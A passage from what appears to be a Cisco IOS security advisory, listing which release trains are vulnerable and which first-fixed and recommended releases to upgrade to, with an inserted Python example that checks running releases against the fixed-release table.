train and the platforms or products for which it is intended. If a
given release train is vulnerable, then the earliest possible
releases that contain the fix (the "First Fixed Release") and the
anticipated date of availability for each are listed in the "Rebuild"
and "Maintenance" columns. A device running a release in the given
train that is earlier than the release in a specific column (less
than the First Fixed Release) is known to be vulnerable. The release
should be upgraded at least to the indicated release or a later
version (greater than or equal to the First Fixed Release label).

For more information on the terms "Rebuild" and "Maintenance,"
consult the following URL: 
http://www.cisco.com/warp/public/620/1.html
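
The table-reading rule described above, as an added example (not Cisco tooling): it parses an IOS release name, looks up the First Fixed Release for the same train, and reports whether the running release is earlier. The ordering used (maintenance number, then rebuild number) is a simplifying assumption, the `FIRST_FIXED` subset is copied from rows of the table below, and the running releases are constructed.

```python
import re

# major.minor(maintenance[letter])TRAIN[rebuild][letter], e.g. 12.2(44)SE4
_RELEASE = re.compile(r"^(\d+)\.(\d+)\((\d+)([a-z]?)\)([A-Z]*)(\d*)([a-z]?)$")

# First Fixed Release per train, copied from table rows that name a single
# release in the same train (a subset, not the whole table).
FIRST_FIXED = {
    "12.0S": "12.0(33)S3",
    "12.2EX": "12.2(40)EX",
    "12.2SE": "12.2(40)SE",
    "12.2SG": "12.2(44)SG",
    "12.2SGA": "12.2(31)SGA9",
    "12.2XN": "12.2(33)XN1",
}


def parse_release(text):
    """Return (train, sort_key), or None when the name does not fit the pattern."""
    m = _RELEASE.match(text.strip())
    if m is None:
        return None
    major, minor, maint, maint_letter, train, rebuild, rebuild_letter = m.groups()
    key = (int(maint), maint_letter, int(rebuild or 0), rebuild_letter)
    return f"{major}.{minor}{train}", key


def is_vulnerable(running):
    """True/False when FIRST_FIXED has a same-train entry; None when the
    release cannot be judged from this subset."""
    parsed = parse_release(running)
    if parsed is None:
        return None  # unparseable release name: check by hand
    train, key = parsed
    fixed = FIRST_FIXED.get(train)
    if fixed is None:
        return None  # cross-train fix, "contact TAC", or row not copied here
    # Earlier than the First Fixed Release means vulnerable.
    return key < parse_release(fixed)[1]


if __name__ == "__main__":
    # Constructed inventory of running releases.
    for release in ("12.2(35)SE5", "12.2(44)SE4", "12.0(33)S2", "12.2(25)SEB4"):
        verdict = {True: "vulnerable", False: "fixed", None: "check table"}
        print(f"{release:14} {verdict[is_vulnerable(release)]}")
```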

+----------------------------------------+
|   Major    | Availability of Repaired  |
|  Release   |         Releases          |
|------------+---------------------------|
|  Affected  | First Fixed | Recommended |
| 12.0-Based |   Release   |   Release   |
|  Releases  |             |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.0       | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.0DA     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.0DB     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.0DC     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | 12.0(33)S3; |             |
| 12.0S      | Available   |             |
|            | on          |             |
|            | 03-APR-2009 |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.0SC     | first fixed |             |
|            | in 12.0S    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.0SL     | first fixed |             |
|            | in 12.0S    |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.0SP     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.0ST     | first fixed |             |
|            | in 12.0S    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.0SX     | first fixed |             |
|            | in 12.0S    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.0SY     | first fixed |             |
|            | in 12.0S    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.0SZ     | first fixed |             |
|            | in 12.0S    |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.0T      | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.0(3c)W5  |
| 12.0W      | first fixed | (8)         |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.0WC     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
| 12.0WT     | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.0XA     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.0XB     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.0XC     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.0XD     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.0XE     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
| 12.0XF     | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.0XG     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.0XH     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Releases    |             |
|            | prior to    |             |
|            | 12.0(4)XI2  |             |
|            | are         |             |
|            | vulnerable, |             |
| 12.0XI     | release     | 12.4(15)T8  |
|            | 12.0(4)XI2  | 12.4(23)    |
|            | and later   |             |
|            | are not     |             |
|            | vulnerable; |             |
|            | first fixed |             |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.0XJ     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.0XK     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.0XL     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.0XM     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.0XN     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.0XQ     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.0XR     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.0XS     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.0XT     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.0XV     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|  Affected  | First Fixed | Recommended |
| 12.1-Based |   Release   |   Release   |
|  Releases  |             |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.1       | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.1AA     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.1AX     | first fixed | 12.2(44)SE4 |
|            | in 12.2SE   |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.1AY     | first fixed | 12.2(44)SE4 |
|            | in 12.2SE   |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.1AZ     | first fixed | 12.2(44)SE4 |
|            | in 12.2SE   |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.1CX     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.1DA     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.1DB     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.1DC     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
| 12.1E      | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.1EA     | first fixed | 12.2(44)SE4 |
|            | in 12.2SE   |             |
|------------+-------------+-------------|
| 12.1EB     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.2(33)    |
| 12.1EC     | first fixed | SCA2        |
|            | in 12.3BC   | 12.2(33)SCB |
|            |             | 12.3(23)BC6 |
|------------+-------------+-------------|
| 12.1EO     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.2(31)    |
| 12.1EU     | first fixed | SGA9        |
|            | in 12.2SG   | 12.2(50)SG  |
|------------+-------------+-------------|
|            | Vulnerable; | 12.2(20)S12 |
| 12.1EV     | first fixed | 12.2(33)SB3 |
|            | in 12.4     | 12.4(15)T8  |
|            |             | 12.4(23)    |
|------------+-------------+-------------|
|            |             | 12.2(31)    |
|            | Vulnerable; | SGA9        |
| 12.1EW     | first fixed | 12.2(50)SG  |
|            | in 12.4     | 12.4(15)T8  |
|            |             | 12.4(23)    |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.1EX     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
| 12.1EY     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.1EZ     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.1GA     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.1GB     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.1T      | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.1XA     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.1XB     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.1XC     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.1XD     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.1XE     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.1XF     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.1XG     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.1XH     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.1XI     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.1XJ     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.1XL     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.1XM     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.1XP     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.1XQ     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.1XR     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.1XS     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.1XT     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.1XU     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.1XV     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.1XW     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.1XX     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.1XY     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.1XZ     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.1YA     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.1YB     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.1YC     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.1YD     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Releases    |             |
|            | prior to    |             |
|            | 12.1(5)YE6  |             |
|            | are         |             |
|            | vulnerable, |             |
| 12.1YE     | release     | 12.4(15)T8  |
|            | 12.1(5)YE6  | 12.4(23)    |
|            | and later   |             |
|            | are not     |             |
|            | vulnerable; |             |
|            | first fixed |             |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.1YF     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.1YH     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
| 12.1YI     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.1YJ     | first fixed | 12.2(44)SE4 |
|            | in 12.2SE   |             |
|------------+-------------+-------------|
|  Affected  | First Fixed | Recommended |
| 12.2-Based |   Release   |   Release   |
|  Releases  |             |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.2       | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.2B      | first fixed | 12.4(23)    |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            |             | 12.2(33)    |
|            | Vulnerable; | SCA2        |
| 12.2BC     | first fixed | 12.2(33)SCB |
|            | in 12.4     | 12.3(23)BC6 |
|            |             | 12.4(15)T8  |
|            |             | 12.4(23)    |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.2BW     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.2(33)SB3 |
| 12.2BX     | first fixed | 12.4(15)T8  |
|            | in 12.4     | 12.4(23)    |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.2BY     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.2BZ     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            |             | 12.2(33)    |
|            | Vulnerable; | SCA2        |
| 12.2CX     | first fixed | 12.2(33)SCB |
|            | in 12.4     | 12.3(23)BC6 |
|            |             | 12.4(15)T8  |
|            |             | 12.4(23)    |
|------------+-------------+-------------|
|            |             | 12.2(33)    |
|            | Vulnerable; | SCA2        |
| 12.2CY     | first fixed | 12.2(33)SCB |
|            | in 12.4     | 12.3(23)BC6 |
|            |             | 12.4(15)T8  |
|            |             | 12.4(23)    |
|------------+-------------+-------------|
|            | Vulnerable; | 12.2(20)S12 |
| 12.2CZ     | first fixed | 12.2(33)SB3 |
|            | in 12.2SB   |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.2DA     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.2DD     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.2DX     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.2(31)    |
| 12.2EW     | first fixed | SGA9        |
|            | in 12.2SG   | 12.2(50)SG  |
|------------+-------------+-------------|
|            | Vulnerable; | 12.2(31)    |
| 12.2EWA    | first fixed | SGA9        |
|            | in 12.2SG   | 12.2(50)SG  |
|------------+-------------+-------------|
| 12.2EX     | 12.2(40)EX  | 12.2(44)EX1 |
|------------+-------------+-------------|
|            | 12.2(44)EY; | 12.2(46)EY; |
| 12.2EY     | Available   | Available   |
|            | on          | on          |
|            | 30-JAN-2009 | 23-JAN-2009 |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.2EZ     | first fixed | 12.2(44)SE4 |
|            | in 12.2SE   |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.2FX     | first fixed | 12.2(44)SE4 |
|            | in 12.2SE   |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.2(44)EX1 |
| 12.2FY     | first fixed | 12.2(44)SE4 |
|            | in 12.2EX   |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.2FZ     | first fixed | 12.2(44)SE4 |
|            | in 12.2SE   |             |
|------------+-------------+-------------|
| 12.2IRA    | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
| 12.2IRB    | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
| 12.2IXA    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2IXB    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2IXC    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2IXD    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2IXE    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2IXF    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2IXG    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2JA     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.2JK     | first fixed | 12.4(23)    |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.2MB     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.2MC     | first fixed | 12.4(23)    |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.2S      | first fixed | 12.2(20)S12 |
|            | in 12.2SB   |             |
|------------+-------------+-------------|
|            | 12.2(33)SB  |             |
|            | 12.2(31)    |             |
| 12.2SB     | SB14;       | 12.2(33)SB3 |
|            | Available   |             |
|            | on          |             |
|            | 16-JAN-2009 |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.2SBC    | first fixed | 12.2(33)SB3 |
|            | in 12.2SB   |             |
|------------+-------------+-------------|
| 12.2SCA    | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
| 12.2SCB    | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
| 12.2SE     | 12.2(40)SE  | 12.2(44)SE4 |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.2SEA    | first fixed | 12.2(44)SE4 |
|            | in 12.2SE   |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.2SEB    | first fixed | 12.2(44)SE4 |
|            | in 12.2SE   |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.2SEC    | first fixed | 12.2(44)SE4 |
|            | in 12.2SE   |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.2SED    | first fixed | 12.2(44)SE4 |
|            | in 12.2SE   |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.2SEE    | first fixed | 12.2(44)SE4 |
|            | in 12.2SE   |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.2SEF    | first fixed | 12.2(44)SE4 |
|            | in 12.2SE   |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.2(44)EX1 |
| 12.2SEG    | first fixed | 12.2(44)SE4 |
|            | in 12.2EX   |             |
|------------+-------------+-------------|
| 12.2SG     | 12.2(44)SG  | 12.2(50)SG  |
|------------+-------------+-------------|
| 12.2SGA    | 12.2(31)    | 12.2(31)    |
|            | SGA9        | SGA9        |
|------------+-------------+-------------|
| 12.2SL     | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
| 12.2SM     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2SO     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2SQ     | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
| 12.2SR     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.2SRA    | migrate to  | 12.2(33)    |
|            | any release | SRC3        |
|            | in 12.2SRC  |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.2SRB    | migrate to  | 12.2(33)    |
|            | any release | SRC3        |
|            | in 12.2SRC  |             |
|------------+-------------+-------------|
| 12.2SRC    | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
| 12.2SRD    | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
| 12.2STE    | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.2SU     | first fixed | 12.4(23)    |
|            | in 12.4T    |             |
|------------+-------------+-------------|
| 12.2SV     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2SVA    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2SVC    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2SVD    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2SVE    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.2SW     | first fixed | 12.4(15)T8  |
|            | in 12.4SW   |             |
|------------+-------------+-------------|
| 12.2SX     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2SXA    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2SXB    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2SXD    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2SXE    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2SXF    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2SXH    | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
| 12.2SXI    | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.2(20)S12 |
| 12.2SY     | first fixed | 12.2(33)SB3 |
|            | in 12.2SB   |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.2(20)S12 |
| 12.2SZ     | first fixed | 12.2(33)SB3 |
|            | in 12.2SB   |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.2T      | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
| 12.2TPC    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.2XA     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.2XB     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.2XC     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.2XD     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.2XE     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            |             | 12.2(33)    |
|            | Vulnerable; | SCA212.2    |
| 12.2XF     | first fixed | (33)SCB12.3 |
|            | in 12.4     | (23)BC612.4 |
|            |             | (15)T812.4  |
|            |             | (23)        |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2XG     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2XH     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2XI     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2XJ     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.2XK     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.2XL     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.2XM     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            |             | 12.2(20)S12 |
|            |             | 12.2(33)SB3 |
|            |             | 12.2(33)    |
| 12.2XN     | 12.2(33)XN1 | SRC3        |
|            |             | 12.2(33)    |
|            |             | XNA2        |
|            |             | 12.2(33r)   |
|            |             | SRD2        |
|------------+-------------+-------------|
| 12.2XNA    | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
| 12.2XNB    | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
|            | 12.2(46)XO; | 12.2(46)XO; |
| 12.2XO     | Available   | Available   |
|            | on          | on          |
|            | 02-FEB-2009 | 02-FEB-2009 |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.2XQ     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.2XR     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.2XS     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.2XT     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.2XU     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.2XV     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.2XW     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.2YA     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
| 12.2YB     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2YC     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2YD     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2YE     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2YF     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2YG     | Vulnerable; |             |
|            | contact TAC |             |
